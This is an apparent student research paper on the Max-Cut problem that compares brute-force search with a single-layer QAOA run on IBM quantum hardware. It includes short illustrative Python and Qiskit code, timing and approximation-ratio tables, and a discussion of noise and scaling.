<p>The Max-Cut problem can be written as a quadratic optimization problem. To see why classical methods are not ideal, it is necessary to understand the structure of its objective function (Lowe, 2025), which reveals the very nature of the Max-Cut problem. Let G = (V, E) be a graph with vertices V and edges E, and let w<sub>ij</sub> denote the weight of edge (i, j). This paper utilizes unweighted graphs, so w<sub>ij</sub> = 1. The variables x<sub>i</sub> ∈ {-1, 1} are binary variables, one for each vertex, representing the set assignment of that vertex, that is, which subset of the partition (A or B) it belongs to. The objective function can then be expressed as:</p>



<figure class="wp-block-image aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="648" height="186" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM.png" alt="" class="wp-image-4582" style="width:260px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM.png 648w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-300x86.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-230x66.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-350x100.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-9.59.46-AM-480x138.png 480w" sizes="(max-width: 648px) 100vw, 648px" /></figure>



<p>For each edge (i, j) connecting vertices i and j: if the two vertices are in the same subset, the product x<sub>i</sub>x<sub>j</sub> equals 1, and since 1 - 1 = 0, the edge is not cut and does not contribute to the cut value of G. If the two vertices are in different subsets, the product equals -1, and since 1 - (-1) = 2, the edge is cut and contributes to the cut value of G (Lowe, 2025). Each vertex pair (x<sub>i</sub>, x<sub>j</sub>) in G is considered twice, once as (x<sub>i</sub>, x<sub>j</sub>) and once as (x<sub>j</sub>, x<sub>i</sub>); although these are technically distinct orderings, they refer to the same edge, so to avoid double counting, the total obtained by summing over every valid vertex pair is divided by 2. C(x) therefore calculates the cut value of the partition encoded by x, and maximizing C(x) over all possible assignments yields the maximum possible cut value for G, which fulfills the objective of the Max-Cut problem.</p>
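<p>A direct translation of this objective into code, under the paper&#8217;s unweighted assumption (w<sub>ij</sub> = 1), can be sketched as follows; here a graph is a list of edges with each edge listed once, so no division by 2 is needed. This is an illustrative sketch, not the authors&#8217; implementation.</p>

<pre class="wp-block-code"><code>def cut_value(edges, x):
    """C(x): number of edges cut by the partition encoded in x.

    edges: list of (i, j) pairs, each edge listed once
    x: sequence mapping each vertex index to +1 or -1
    """
    # (1 - x[i] * x[j]) is 0 for an uncut edge and 2 for a cut edge
    return sum((1 - x[i] * x[j]) // 2 for i, j in edges)

edges = [(0, 1), (1, 2), (2, 3), (0, 3), (0, 2)]  # small example graph
x = [1, -1, 1, -1]  # each vertex assigned to subset A (+1) or B (-1)
print(cut_value(edges, x))  # 4 of the 5 edges are cut</code></pre>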



<p>Each vertex can be in one of two possible subsets. Because of this, the solution space of graph G, or the total number of possible partitions, is 2<sup>n</sup>, where <em>n</em> represents the number of vertices in G. Therefore, as n increases, the number of possible partitions increases exponentially, which becomes infeasible beyond a certain point, especially for large values of n, because the time and resources required to iterate over all 2<sup>n</sup> possible combinations grow too large. This is why maximizing C(x) is NP-hard, and why almost all algorithms created to attempt a solution to the Max-Cut problem are approximation algorithms. These are designed to produce near-optimal solutions within reasonable time limits, rather than iterating over all 2<sup>n</sup> possible partitions, which is known as the brute-force method, theoretically the only approach here that guarantees an approximation ratio of exactly 1.</p>
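<p>The brute-force baseline used in this paper&#8217;s comparison can be sketched in a few lines: enumerate all 2<sup>n</sup> assignments and keep the best. The code below is an illustrative version, not the authors&#8217; exact implementation.</p>

<pre class="wp-block-code"><code>from itertools import product

def max_cut_brute_force(n, edges):
    """Exhaustively search all 2**n partitions; runtime is exponential in n."""
    best_value, best_assignment = -1, None
    for x in product((1, -1), repeat=n):
        value = sum((1 - x[i] * x[j]) // 2 for i, j in edges)
        if value &gt; best_value:
            best_value, best_assignment = value, x
    return best_value, best_assignment

print(max_cut_brute_force(4, [(0, 1), (1, 2), (2, 3), (0, 3)]))
# (4, (1, -1, 1, -1)): the alternating partition cuts all four edges</code></pre>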



<p>One of the simplest classical approximation approaches is the greedy algorithm (Codecademy, 2022), which assigns each vertex to the set that yields the largest immediate increase in cut size. Because of this short-sightedness, despite their speed, greedy approaches often get stuck in locally optimal configurations that are not globally optimal. A significantly more powerful classical approach is the Goemans–Williamson algorithm (Cai, 2003), which uses a mathematical technique called semidefinite programming (SDP) to represent vertices as unit vectors on a hypersphere, followed by randomized rounding to generate a cut. It carries the best known approximation guarantee of any polynomial-time classical algorithm: a ratio of at least 0.878, meaning the cut it produces is guaranteed to be at least 87.8% of the optimal cut value, regardless of graph size.</p>
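<p>For contrast, a minimal greedy sketch is shown below (illustrative; the vertex order and tie-breaking are arbitrary, which is precisely why such heuristics can get stuck in local optima). Each vertex is placed on whichever side cuts more of the edges to its already-placed neighbours:</p>



<pre class="wp-block-code"><code>def greedy_max_cut(n, edges):
    """Assign each vertex to the side giving the larger immediate cut gain."""
    side = {}
    for v in range(n):
        # Edges to already-placed neighbours that would be cut by each choice.
        gain_a = sum(1 for i, j in edges
                     if (i == v and side.get(j) == "B")
                     or (j == v and side.get(i) == "B"))
        gain_b = sum(1 for i, j in edges
                     if (i == v and side.get(j) == "A")
                     or (j == v and side.get(i) == "A"))
        side[v] = "A" if gain_a >= gain_b else "B"
    return side

print(greedy_max_cut(4, [(0, 1), (1, 2), (2, 3), (3, 0)]))
# {0: 'A', 1: 'B', 2: 'A', 3: 'B'}
</code></pre>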



<p>Although such classical approximation algorithms are reasonably efficient, their performance diminishes for very large or dense graphs, motivating research on alternative methods – quantum methods.</p>



<h4 class="wp-block-heading"><strong>Introduction to Quantum Computing – For the Max-Cut Problem</strong></h4>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="750" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-1024x750.png" alt="" class="wp-image-4585" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-1024x750.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-300x220.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-768x562.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-1000x732.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-230x168.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-350x256.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM-480x352.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-28-at-10.05.49-AM.png 1218w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>When multiple qubits are combined, they can represent an exponentially large number of possible states at the same time. For a system with n qubits, the state is described by a complex state vector in a 2<sup>n</sup>-dimensional space. This property of superposition (Thomson, 2025) is extremely valuable because it enables a quantum state to represent all 2<sup>n</sup> basis states at once. Such simultaneous representation makes quantum parallelism – the ability of a single (unitary) operation to act on all superimposed states at the same time – possible (Kaye &amp; Mosca, 2020), which is what gives quantum computing its edge over classical computing: while a classical computer must check all 2<sup>n</sup> possible combinations one at a time, a quantum computer can describe them all as a superposition of states within a compound state vector and manipulate them in parallel.</p>
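<p>This exponential state space is easy to see in code. A minimal Qiskit sketch (the qubit count is chosen arbitrarily) prepares the uniform superposition with one Hadamard gate per qubit and confirms that the resulting state vector has 2<sup>n</sup> equal-probability amplitudes:</p>



<pre class="wp-block-code"><code>from qiskit import QuantumCircuit
from qiskit.quantum_info import Statevector

n = 3
qc = QuantumCircuit(n)
qc.h(range(n))  # one Hadamard per qubit: uniform superposition over 2**n states

state = Statevector.from_instruction(qc)
print(state.dim)              # 8 amplitudes, i.e. 2**3 basis states
print(state.probabilities())  # each basis state has probability 1/8
</code></pre>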



<p>Quantum computers also use a phenomenon known as entanglement, in which two or more quantum particles – in this case, qubits – share a quantum state, causing the state of one particle to affect the states of the other entangled particles regardless of the distance between them. This link between qubits serves numerous functions in quantum computing. Together, superposition and entanglement allow quantum computers to explore multiple possible solutions – and, given enough qubits, the entire solution space – simultaneously, with far fewer resources than classical computers, making quantum algorithms promising candidates for NP-hard problems such as the Max-Cut problem, even though, unlike the brute-force method, they are not exact (Preskill, 2018).</p>



<h4 class="wp-block-heading"><strong>The Quantum Approximate Optimization Algorithm (QAOA)</strong></h4>



<p>The Quantum Approximate Optimization Algorithm, or QAOA, is a prominent hybrid (classical plus quantum) algorithm that specializes in finding approximate solutions to combinatorial optimization problems, like the Max-Cut problem, that are classically infeasible (Blekos et al., 2023). It works by alternating between two Hamiltonian operators. In simple terms, a Hamiltonian is a quantum operator that represents the total energy of a system (Agarapu, 2024).</p>



<p>The first is known as the ‘Cost Hamiltonian’ (EITCA, 2024). It is based on the objective function of the Max-Cut problem and assigns energy levels to different possible solutions, with lower energy levels corresponding to better cut values. After the Cost Hamiltonian is applied to the initial quantum state, the resultant state is biased towards generally good solutions (not necessarily the best ones), so it can get stuck in a region of the solution space with a low energy level (EITCA, 2024). This is where the second operator, the ‘Mixer Hamiltonian’ (EITCA, 2024), comes in. It “mixes” the quantum state by flipping qubits in a way that redistributes amplitude between different energy levels, creating new superpositions of states, allowing greater exploration of the solution space and consequently increasing the chance of finding better solutions. These two operators are repeated for p layers, where p is the depth of the quantum circuit.</p>



<p>Each layer k is parameterized by two angles: γ<sub>k</sub> (the Cost Hamiltonian parameter) and β<sub>k</sub> (the Mixer Hamiltonian parameter). These angles are optimized using classical optimization techniques (Ivezic, 2024) and are then used in the next iteration to improve the performance of the Hamiltonians and reach even lower energy levels. So, theoretically, as the circuit depth p approaches infinity, QAOA moves closer to the lowest energy level of the Cost Hamiltonian, closer to the perfect approximation ratio of 1, and thus closer to the exact solution of the Max-Cut problem for graph G. This hybrid approach makes QAOA suitable for today’s noisy, small-scale NISQ quantum devices, which is why it is one of the most successful quantum approximation algorithms for the Max-Cut problem.</p>
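<p>The classical outer loop is conceptually simple. The sketch below illustrates it under stated assumptions: ‘expected_cost()’ is a hypothetical stand-in for running the parameterized circuit and averaging the measured cut values (the experiment in this paper omits this loop entirely and fixes the angles instead):</p>



<pre class="wp-block-code"><code>import numpy as np
from scipy.optimize import minimize

def expected_cost(params):
    gamma, beta = params
    # Placeholder landscape. In real QAOA this would run the circuit with
    # these angles, measure, and return the negative mean cut value
    # (minimizing the negative maximizes the cut).
    return -np.cos(gamma) * np.sin(beta)

result = minimize(expected_cost, x0=[np.pi / 4, np.pi / 2], method="COBYLA")
print(result.x)  # optimized (gamma, beta) fed back into the next circuit run
</code></pre>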



<h4 class="wp-block-heading"><strong>Limitations of Quantum Approaches</strong></h4>



<p>Although quantum approaches like QAOA are elegantly promising, their performance is limited by modern quantum hardware. Quantum computers are considerably noisy: qubits’ states are disturbed and lose information (Preskill, 2018) through a process known as decoherence (Bacon, 2003), degrading solution quality. The greater the qubit count, the greater the capabilities of the hardware, but also the greater the chance of decoherence. Additionally, most devices have a limited number of qubits – under 200 – and restricted qubit connectivity due to suboptimal qubit quality (Preskill, 2018; Swayne, 2024), which can make running larger quantum circuits quite inefficient. This also prevents true ‘fault-tolerant’ quantum computing (Davis et al., 2025) with consistent real-time error correction, meaning that QAOA circuits accumulate noise as they run.</p>



<p>Because of these constraints, experiments involving QAOA usually focus on very small graphs and circuits with very limited depth, which is why they cannot yet be scaled to large problem sizes (Lotshaw et al., 2022). These limitations mean that quantum computers cannot yet outperform classical algorithms on the large problems where they are expected to thrive; nevertheless, studying QAOA on real devices is essential for understanding how performance scales as hardware improves.</p>



<h2 class="wp-block-heading"><strong>Methodology</strong></h2>



<p>Having established the foundations of both classical and quantum methods for solving the Max-Cut problem, along with the strengths and limitations of each, the next step is to investigate how they perform in practice. This section details the methodology used to analyze, evaluate, and compare the performance of the Quantum Approximate Optimization Algorithm (QAOA) against the classical brute-force method on instances of the Max-Cut problem. The investigation aims to demonstrate how each algorithm scales as graph size and problem complexity increase, and whether quantum algorithms begin to exhibit any advantages over classical algorithms as input size grows.</p>



<p>The methodology is structured into two parts. The first outlines experimental details, including the overall set-up, graph generation, quantum hardware, and technical settings for both the classical and quantum solutions. The second discusses the performance metrics used, such as execution time and approximation ratio, and explains how they are calculated.</p>



<h4 class="wp-block-heading"><strong>Experimental Details</strong></h4>



<p>The investigation uses a controlled computational set-up to compare the performance of the classical brute-force algorithm and QAOA on the Max-Cut problem. It was implemented in Python using IBM’s ‘Qiskit Runtime Service’ (version 0.42.0) and the ‘Qiskit SDK’ (version 2.1.1) for access to quantum hardware, and ‘Matplotlib’ (version 3.10.6) and ‘Rustworkx’ (version 0.17.1) for graph creation and computation. The quantum processor used was ‘IBM_Torino’, which houses 133 qubits. A series of unweighted graphs was created using the ‘create_sample_graph()’ function, with sizes ranging from 4 to 24 nodes. Each graph was created as a polygon whose vertex count matches the specified number of nodes, with a few additional edges connecting non-adjacent nodes for structural variety.</p>
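<p>The exact edge pattern produced by ‘create_sample_graph()’ is not reproduced in this paper, but a hypothetical reconstruction consistent with the description (a polygon of n nodes plus a few chords between non-adjacent nodes) might look like the following Rustworkx sketch; the chord choices here are invented for illustration:</p>



<pre class="wp-block-code"><code>import rustworkx as rx

def create_sample_graph(n):
    """Hypothetical reconstruction: an n-node polygon plus a few chords."""
    g = rx.PyGraph()
    g.add_nodes_from(range(n))
    g.add_edges_from([(i, (i + 1) % n, 1.0) for i in range(n)])  # polygon edges
    if n > 4:
        g.add_edge(0, n // 2, 1.0)      # example chords between non-adjacent
        g.add_edge(1, n // 2 + 1, 1.0)  # nodes; the actual pattern is unspecified
    return g

g = create_sample_graph(8)
print(g.num_nodes(), g.num_edges())  # 8 10
</code></pre>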



<p>The Max-Cut problem was solved using two approaches: (1) the classical brute-force algorithm, implemented in the ‘classical_max_cut_brute_force()’ function, which exhaustively evaluates all 2<sup>n</sup> possible vertex partitions to determine the one with the optimal cut value; and (2) QAOA, whose circuit is created via the ‘create_qaoa_circuit()’ function and run via the ‘run_qaoa_modern()’ function, which communicates with the chosen quantum device in the backend, or falls back to a local Aer simulator when no device is selected or available.</p>



<p>The QAOA implementation uses a circuit with a depth of a single layer (p = 1) and fixed parameters γ = π/4 and β = π/2 for the cost and mixer Hamiltonians respectively, corresponding to one cost–mixer iteration. Thus, no classical optimizer was used in this investigation. Each circuit begins by preparing every qubit in the plus state, forming a uniform superposition over the compound n-qubit quantum state; the cost and mixer layers then encode and explore the solution space respectively, and the qubits are measured. Qubits are mapped to the quantum device, and while the “job” (the QAOA run) has not yet completed or terminated, its status on the quantum device is polled every 10 seconds.</p>
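<p>The paper’s ‘create_qaoa_circuit()’ is not printed here, but a minimal Qiskit sketch consistent with the stated configuration (p = 1, γ = π/4, β = π/2, plus-state preparation, cost layer, mixer layer, measurement) might look like:</p>



<pre class="wp-block-code"><code>import numpy as np
from qiskit import QuantumCircuit

def create_qaoa_circuit(n, edges, gamma=np.pi / 4, beta=np.pi / 2):
    """Hypothetical single-layer (p = 1) QAOA circuit for unweighted Max-Cut."""
    qc = QuantumCircuit(n)
    qc.h(range(n))               # plus state on every qubit (uniform superposition)
    for i, j in edges:
        qc.rzz(2 * gamma, i, j)  # cost layer: one ZZ rotation per edge
    for q in range(n):
        qc.rx(2 * beta, q)       # mixer layer: X rotations redistribute amplitude
    qc.measure_all()
    return qc
</code></pre>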



<p>To compare the brute-force algorithm and QAOA, 5 trials were performed for each graph size (4–24 nodes). In each trial, both algorithms were run, with execution time measured for both and approximation ratio measured for QAOA. The mean execution time of each algorithm at each graph size was then calculated, and the results were plotted on a scatter plot created in ‘Desmos’ showing execution time vs. graph size for both algorithms.</p>



<h4 class="wp-block-heading"><strong>Methodological Considerations</strong></h4>



<p>As mentioned earlier, the QAOA circuit has only a single cost–mixer layer (p = 1) and therefore no classical optimizer. These choices keep the investigation easy to interpret and reproduce – so that similar results are obtained when the experiment is repeated – and prevent the complexity of the optimizer from confounding QAOA’s behavior. The cost of this approach, however, is the accuracy of the resulting cut values.</p>



<p>Five trials per graph size were performed for statistical accuracy and error minimization, and a graph-size increment of 2 nodes was judged small enough to accurately capture the relationship between execution time and graph size for both algorithms.</p>



<p>The brute-force algorithm finds the optimal cut value 100% of the time, as it evaluates every possible partition of the graph. QAOA, on the other hand, does not, because measuring a quantum circuit is probabilistic in nature; to maintain consistency and ensure fair comparisons, it was therefore run with identical circuit configurations and constant cost and mixer Hamiltonian parameters.</p>



<h4 class="wp-block-heading"><strong>Performance Metrics</strong></h4>



<p>The primary measure of algorithmic performance is execution time, measured using the ‘time.perf_counter()’ function from Python’s ‘time’ module. The function executing the brute-force algorithm – ‘classical_max_cut_brute_force()’ – contains only the necessary steps of the brute-force algorithm, so its entire runtime is measured. The function executing QAOA – ‘run_qaoa_modern()’ – is measured only from circuit creation until the QAOA “job” reaches a completed or terminated state. The sleep time is not included, as it is simply a delay added to avoid constantly querying the job status and is therefore not part of the QAOA procedure.</p>
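<p>A small timing wrapper in the spirit of this measurement scheme is sketched below (the helper name is invented; in the experiment the timed callables were the brute-force solver and the QAOA run, with queue-polling sleeps excluded):</p>



<pre class="wp-block-code"><code>import time

def timed(fn, *args):
    """Measure wall-clock runtime of fn(*args) with a high-resolution counter."""
    start = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - start

# Placeholder workload for demonstration.
result, seconds = timed(sum, range(10**6))
print(f"{seconds:.6f} s")
</code></pre>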



<p>The secondary measure of algorithmic performance is the approximation ratio, calculated by dividing the cut value produced by an algorithm by the optimal cut value. In practice this applies only to QAOA, since the brute-force algorithm always yields the optimal cut value and so has an approximation ratio of 1 in all cases. The ratio matters because it measures how accurate an algorithm is – here, how close the cut values QAOA produces are to the optimal cut value. It is not the primary metric because the variable of interest is execution time, which is theorized to be a major advantage of quantum algorithms over classical ones.</p>



<h2 class="wp-block-heading"><strong>Results</strong></h2>



<p>This section presents the results of the experiment, comparing the classical and quantum algorithms on the performance metrics described above. Note that figures of the individual graphs are not shown in this paper, owing to the sheer volume of trials and because the variable of interest is execution time, not graph structure.</p>



<p>Below are data tables presenting the execution times of both algorithms over 5 independent trials for each graph size (4–24 nodes), along with their approximation ratios relative to the optimal cut value. The first table shows this information for the brute-force algorithm, and the second shows the same for QAOA executed on real quantum hardware. Both include a column of average execution times; unless otherwise noted, references to execution time below refer to this average.</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td colspan="8">Table 1: Execution Time vs. Graph Size for Classical Brute-Force Algorithm</td></tr><tr><td rowspan="2"><br>Graph Size</td><td rowspan="2"><br>Max Cut Value</td><td colspan="6">Execution time (seconds)</td></tr><tr><td>Trial 1</td><td>Trial 2</td><td>Trial 3</td><td>Trial 4</td><td>Trial 5</td><td>Average</td></tr><tr><td>4 nodes</td><td>4</td><td>0.000048900</td><td>0.000068399</td><td>0.00061139</td><td>0.000047400</td><td>0.000046200</td><td>0.00016445</td></tr><tr><td>6 nodes</td><td>8</td><td>0.00013079</td><td>0.00013230</td><td>0.00013129</td><td>0.00013210</td><td>0.00011180</td><td>0.00012765</td></tr><tr><td>8 nodes</td><td>9</td><td>0.00063640</td><td>0.00098330</td><td>0.00051240</td><td>0.00056620</td><td>0.00055640</td><td>0.00065094</td></tr><tr><td>10 nodes</td><td>10</td><td>0.0034135</td><td>0.0026266</td><td>0.0021856</td><td>0.0022532</td><td>0.0016598</td><td>0.0024277</td></tr><tr><td>12 nodes</td><td>13</td><td>0.01210</td><td>0.013442</td><td>0.010271</td><td>0.0067686</td><td>&nbsp;0.0098584</td><td>0.010488</td></tr><tr><td>14 nodes</td><td>16</td><td>0.053149</td><td>0.05270</td><td>0.032454</td><td>0.032022</td><td>0.032837</td><td>0.040632</td></tr><tr><td>16 nodes</td><td>19</td><td>0.25040</td><td>0.27612</td><td>0.15549</td><td>0.15498</td><td>0.16060</td><td>0.19952</td></tr><tr><td>18 nodes</td><td>20</td><td>0.67715</td><td>0.69035</td><td>0.71505</td><td>0.71792</td><td>0.71647</td><td>0.70339</td></tr><tr><td>20 nodes</td><td>22</td><td>3.1328</td><td>3.1761</td><td>3.3504</td><td>3.3003</td><td>3.3307</td><td>3.2581</td></tr><tr><td>22 nodes</td><td>24</td><td>15.369</td><td>15.252</td><td>16.070</td><td>22.806</td><td>20.876</td><td>18.075</td></tr><tr><td>24 nodes</td><td>25</td><td>75.737</td><td>100.03</td><td>72.953</td><td>68.929</td><td>120.39</td><td>87.608</td></tr></tbody></table></figure>



<p>Table 1 displays the execution time of the classical brute-force algorithm for each graph size across all 5 trials. As expected, as the graph grows, the average runtime increases at a seemingly exponential rate, reflecting the non-polynomial time complexity of enumerating all vertex partitions. The approximation ratio remains a constant 1.00 across all trials – which is why it is not tabulated – confirming that the brute-force method yields the exact maximum cut.</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td colspan="8">Table 2: Execution Time vs. Graph Size for QAOA</td></tr><tr><td rowspan="2"><br>Graph Size</td><td rowspan="2"><br>Max Cut Value<br></td><td colspan="6">Execution Time (seconds)</td></tr><tr><td>Trial 1</td><td>Trial 2</td><td>Trial 3</td><td>Trial 4</td><td>Trial 5</td><td>Average</td></tr><tr><td>4 nodes</td><td>4</td><td>1.5329</td><td>1.8548</td><td>1.2851</td><td>1.2273</td><td>1.3695</td><td>1.45392</td></tr><tr><td>6 nodes</td><td>8</td><td>1.4679</td><td>1.4042</td><td>1.2365</td><td>1.3553</td><td>1.3079</td><td>1.35436</td></tr><tr><td>8 nodes</td><td>9</td><td>1.5522</td><td>1.1189</td><td>1.2144</td><td>1.2766</td><td>1.8764</td><td>1.4077</td></tr><tr><td>10 nodes</td><td>10</td><td>1.3079</td><td>1.2546</td><td>1.1543</td><td>1.2795</td><td>1.2578</td><td>1.25082</td></tr><tr><td>12 nodes</td><td>13</td><td>1.4196</td><td>1.3601</td><td>1.3318</td><td>1.3898</td><td>1.1510</td><td>1.33046</td></tr><tr><td>14 nodes</td><td>16</td><td>1.2429</td><td>1.1418</td><td>1.3929</td><td>1.4978</td><td>1.3784</td><td>1.33076</td></tr><tr><td>16 nodes</td><td>19</td><td>1.3868</td><td>1.7303</td><td>1.2675</td><td>1.2200</td><td>1.2308</td><td>1.36708</td></tr><tr><td>18 nodes</td><td>20</td><td>1.8422</td><td>1.6108</td><td>1.3401</td><td>1.1964</td><td>1.2257</td><td>1.44304</td></tr><tr><td>20 nodes</td><td>22</td><td>1.5191</td><td>1.7161</td><td>1.1193</td><td>1.2715</td><td>1.1607</td><td>1.35734</td></tr><tr><td>22 nodes</td><td>24</td><td>1.4184</td><td>1.5857</td><td>1.2135</td><td>1.8770</td><td>1.1747</td><td>1.45386</td></tr><tr><td>24 nodes</td><td>25</td><td>1.6708</td><td>1.8790</td><td>1.2972</td><td>1.1811</td><td>1.3207</td><td>1.46976</td></tr></tbody></table></figure>



<p>Table 2 presents the execution time of QAOA for each graph size across all 5 trials. Contrary to the expectation stated earlier in the paper that execution time would increase roughly linearly with graph size, the averages fluctuate within a narrow range as graph size increases, with no discernible trend.</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td colspan="8">Table 3: Approximation Ratio vs. Graph Size for QAOA</td></tr><tr><td rowspan="2"><br>Graph Size</td><td rowspan="2"><br>Max Cut Value<br></td><td colspan="6">Approximation Ratio</td></tr><tr><td>Trial 1</td><td>Trial 2</td><td>Trial 3</td><td>Trial 4</td><td>Trial 5</td><td>Average</td></tr><tr><td>4 nodes</td><td>4</td><td>0.750</td><td>1.00</td><td>1.00</td><td>1.00</td><td>1.00</td><td>0.95</td></tr><tr><td>6 nodes</td><td>8</td><td>0.625</td><td>0.625</td><td>1.00</td><td>0.625</td><td>0.625</td><td>0.7</td></tr><tr><td>8 nodes</td><td>9</td><td>0.778</td><td>0.778</td><td>0.556</td><td>0.778</td><td>0.667</td><td>0.7114</td></tr><tr><td>10 nodes</td><td>10</td><td>0.800</td><td>0.600</td><td>0.800</td><td>0.800</td><td>0.800</td><td>0.76</td></tr><tr><td>12 nodes</td><td>13</td><td>0.692</td><td>0.692</td><td>0.846</td><td>0.615</td><td>0.846</td><td>0.7382</td></tr><tr><td>14 nodes</td><td>16</td><td>0.750</td><td>0.500</td><td>0.625</td><td>0.688</td><td>0.688</td><td>0.6502</td></tr><tr><td>16 nodes</td><td>19</td><td>0.684</td><td>0.632</td><td>0.684</td><td>0.579</td><td>0.632</td><td>0.6422</td></tr><tr><td>18 nodes</td><td>20</td><td>0.65</td><td>0.700</td><td>0.550</td><td>0.650</td><td>0.700</td><td>0.65</td></tr><tr><td>20 nodes</td><td>22</td><td>0.591</td><td>0.591</td><td>0.591</td><td>0.727</td><td>0.591</td><td>0.6182</td></tr><tr><td>22 nodes</td><td>24</td><td>0.708</td><td>0.542</td><td>0.667</td><td>0.625</td><td>0.583</td><td>0.625</td></tr><tr><td>24 nodes</td><td>25</td><td>0.680</td><td>0.056</td><td>0.680</td><td>0.560</td><td>0.600</td><td>0.5152</td></tr></tbody></table></figure>



<p>Table 3 presents the approximation ratios (relative to the optimal cut value) of the QAOA runs for each graph size across all 5 trials. Here, the average approximation ratio can be seen to decrease as graph size increases, showing that the algorithm becomes less accurate as complexity increases. Potential reasons for this are explored in the next section.</p>



<p>The results of Table 1 and Table 2 are plotted on the scatter plot below, showing execution time vs. graph size for both algorithms, to illustrate the trend of each algorithm’s behavior and provide a visual representation of the scalability advantages of quantum algorithms for problems like Max-Cut.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="884" height="926" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-34.png" alt="" class="wp-image-4586" style="width:592px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-34.png 884w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-286x300.png 286w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-768x804.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-230x241.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-350x367.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-34-480x503.png 480w" sizes="(max-width: 884px) 100vw, 884px" /></figure>



<p>From the graph, the execution time of the brute-force solution shows exponential growth, whereas the execution time of the QAOA solution is almost flat. At around 19 nodes, the two average execution time curves intersect, after which the brute-force solution’s execution time exceeds that of QAOA. This visual representation makes it even clearer how quickly the brute-force algorithm becomes unscalable beyond a certain point, unlike QAOA, which, although less accurate, stays relatively constant in execution time. Note that the ‘24 nodes’ datapoint for the brute-force solution is not shown: including it would make the fluctuations of the QAOA datapoints almost impossible to discern, and the gap between the two curves before their intersection would be too small to see.</p>



<h2 class="wp-block-heading"><strong>Discussion</strong></h2>



<p>This section analyzes the results of the comparison between the classical brute-force algorithm and QAOA in solving the Max-Cut problem. The discussion evaluates the observed trend between execution time and graph size for both algorithms, analyzes fluctuations and deviations from expected theoretical behavior, and explores the trend of the approximation ratio as graph size increases. It further investigates the causes of these trends, linking them to both algorithmic configuration and the hardware limitations of modern Noisy Intermediate-Scale Quantum (NISQ) devices (Mahmoud, 2021).</p>



<p>The execution time vs. graph size model derived from the data tables in the previous section shows a strong contrast between the two algorithms. As expected, the classical brute-force solution shows exponential growth in execution time as the number of vertices increases. This is consistent with the underlying theory: every possible partition of vertices into two sets must be evaluated to find the optimal cut value. For small graphs (4–12 nodes), execution time remains quite short, but as graph size approaches 20–24 nodes, it grows dramatically, as an exponential function must, quickly rendering brute-force computation infeasible on standard hardware. This rapid escalation illustrates why NP-hard problems like Max-Cut have no known efficient classical solutions (solutions with polynomial time complexity) and become completely infeasible at scale, underscoring the need to explore quantum approaches that could, in theory, offer efficient alternatives.</p>



<p>The QAOA solution, however, displays a very different trend. Rather than growing with problem size, its execution times fluctuate within a relatively narrow range, appearing almost constant across the entire set of tested graph sizes. This contrasts with theoretical expectations for QAOA, whose execution time should grow approximately linearly with the number of qubits (and therefore graph size) at a fixed circuit depth (p = 1). The observed stability, and the randomness in runtime causing the fluctuations, can be explained by a combination of quantum hardware behavior and implementation-level constraints. First, the QAOA code used in this experiment employs a fixed circuit depth and fixed Hamiltonian parameters γ = π/4 and β = π/2. Because depth and parameters remain constant, with no classical optimizer manipulating the parameters, the computational workload submitted to the 133-qubit ‘IBM_Torino’ device does not increase meaningfully with graph size within the tested range – there are enough qubits to encode the entire solution space at once. The quantum processing time per circuit therefore remains nearly unchanged across the tested graph sizes, with small fluctuations attributable to backend scheduling variation, noise, and similar factors. In practical settings, Max-Cut instances often involve hundreds or thousands of nodes – almost always more than the available qubit count – leading to processing time per circuit that does increase with graph size. Thus, under ideal low-noise conditions and with greater circuit depth, the execution time of a QAOA solution could be expected to increase roughly linearly with the number of qubits (and graph nodes) on large, complex graphs.</p>



